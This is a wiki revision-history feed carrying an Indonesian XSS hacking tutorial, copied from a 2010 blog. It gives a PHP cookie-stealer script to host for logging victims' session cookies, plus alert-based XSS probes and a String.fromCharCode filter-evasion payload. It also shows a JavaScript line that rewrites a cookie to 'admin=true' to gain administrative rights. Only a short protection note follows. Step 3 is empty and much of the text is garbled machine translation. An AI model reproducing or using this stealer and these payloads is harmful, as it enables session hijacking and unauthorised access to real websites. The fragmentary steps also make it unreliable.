<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Injeksi_XSS_Ke_Dalam_Website</id>
	<title>Injeksi XSS Ke Dalam Website - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Injeksi_XSS_Ke_Dalam_Website"/>
	<link rel="alternate" type="text/html" href="https://onnocenter.or.id/wiki/index.php?title=Injeksi_XSS_Ke_Dalam_Website&amp;action=history"/>
	<updated>2026-04-23T02:08:24Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.4</generator>
	<entry>
		<id>https://onnocenter.or.id/wiki/index.php?title=Injeksi_XSS_Ke_Dalam_Website&amp;diff=24250&amp;oldid=prev</id>
		<title>Onnowpurbo: New page: Sumber: http://ujie-caprone.blogspot.com/2010/05/injeksi-xss-ke-dalam-website.html  Posted by Ujie Caprone on 03.56  Sebelumn memulai kita cek dulu web tersebut bisa di injeksi atau tidak ...</title>
		<link rel="alternate" type="text/html" href="https://onnocenter.or.id/wiki/index.php?title=Injeksi_XSS_Ke_Dalam_Website&amp;diff=24250&amp;oldid=prev"/>
		<updated>2011-01-04T13:10:43Z</updated>

		<summary type="html">&lt;p&gt;New page: Sumber: http://ujie-caprone.blogspot.com/2010/05/injeksi-xss-ke-dalam-website.html  Posted by Ujie Caprone on 03.56  Sebelumn memulai kita cek dulu web tersebut bisa di injeksi atau tidak ...&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Sumber: http://ujie-caprone.blogspot.com/2010/05/injeksi-xss-ke-dalam-website.html&lt;br /&gt;
&lt;br /&gt;
Posted by Ujie Caprone on 03.56&lt;br /&gt;
&lt;br /&gt;
Sebelumn memulai kita cek dulu web tersebut bisa di injeksi atau tidak caranya ada di step 2&lt;br /&gt;
&lt;br /&gt;
==Step 1==&lt;br /&gt;
&lt;br /&gt;
 /*Ethernets Cookie Stealer */&lt;br /&gt;
 /*Put this up on your free site */&lt;br /&gt;
 $cookie = $_GET['cookie'];&lt;br /&gt;
 $log = fopen(&amp;quot;xssed.txt&amp;quot;,&amp;quot;a&amp;quot;);&lt;br /&gt;
 fwrite($log, $cookie .&amp;quot;\n&amp;quot;);&lt;br /&gt;
 fclose($log);&lt;br /&gt;
 ?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 save =&amp;gt; stealer.php&lt;br /&gt;
&lt;br /&gt;
==Step2==&lt;br /&gt;
&lt;br /&gt;
Untuk pengecekan apakah bisa di inject xss gunain javascriptnya&lt;br /&gt;
&lt;br /&gt;
Selanjutnya kalau misalkan web tersebut bisa di injeksi karena ada alert yg muncul...&lt;br /&gt;
&lt;br /&gt;
==Step 3==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==step 4==&lt;br /&gt;
Nah buka xssed.txtnya deh&lt;br /&gt;
&lt;br /&gt;
==step 5==&lt;br /&gt;
Cookie Manipulation:&lt;br /&gt;
&lt;br /&gt;
Ni cuman contoh aja&lt;br /&gt;
Terkadang lo bakan melihat cookie yang terlihat seperti:&lt;br /&gt;
&lt;br /&gt;
 Admin=false;&lt;br /&gt;
Or&lt;br /&gt;
 Logged_in=true;&lt;br /&gt;
&lt;br /&gt;
Jangan binggung gunain javascriptnya&lt;br /&gt;
&lt;br /&gt;
 Javascript:alert(document.cookie);&lt;br /&gt;
&lt;br /&gt;
Keterangan&lt;br /&gt;
&lt;br /&gt;
Ini akan membuat sebuah kotak yang berisi peringatan&lt;br /&gt;
bahwa telah menerima. Untuk kepentingan ini demonstrasi, mari kita&lt;br /&gt;
katakan cookie terlihat seperti ini&lt;br /&gt;
&lt;br /&gt;
 Logged_in=true, admin=false, fusionid=12312313&lt;br /&gt;
&lt;br /&gt;
Jadi, satu-satunya bagian yang sangat penting bagi qt adalah “admin = false”, sisanya adalah non-sense bahwa kita tidak perlu khawatir tentang. Tentunya, lo mungkin menemukan wont terlalu banyak situs web , tapi ini hanya dimaksudkan untuk memberikan dasar-dasar cara this.Obviously, kita dapat melihat bahwa jika kita ajukan ke cookie “admin = true” kita akan memiliki hak administratif. Dengan ini berikutnya sederhana JavaScript injeksi qt dapat mengubah cookienya menjadi.&lt;br /&gt;
&lt;br /&gt;
 Javascript:void(document.cookie=“admin=true”);&lt;br /&gt;
&lt;br /&gt;
js di atas a/ hak administratif&lt;br /&gt;
&lt;br /&gt;
Perlindungan:&lt;br /&gt;
&lt;br /&gt;
“Jangan pernah percaya masukan pengguna dan selalu metakarakter penyaring”. Anda dapat menyaring JS atau HTML encode js. Pengalaman sebagai pengguna selalu mencoba untuk menghindari pergi ke luar adalah setiap link yang terhubung ke host lain. Hal ini dapat memecahkan 90% dari masalah terjangkitnya xss di web lo&lt;br /&gt;
Agar xss lo aman dr ripper bisa gunain string char code&lt;br /&gt;
dapat di inject dengan js&lt;br /&gt;
&lt;br /&gt;
 /&amp;quot;;alert(String.fromCharCode(88,83,83))&lt;br /&gt;
 translate=&amp;gt;88,83,83 =&amp;gt;XSS&lt;br /&gt;
&lt;br /&gt;
Source: Binus Hacker&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* http://ujie-caprone.blogspot.com/2010/05/injeksi-xss-ke-dalam-website.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Keamanan Jaringan]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Network Security]]&lt;/div&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
</feed>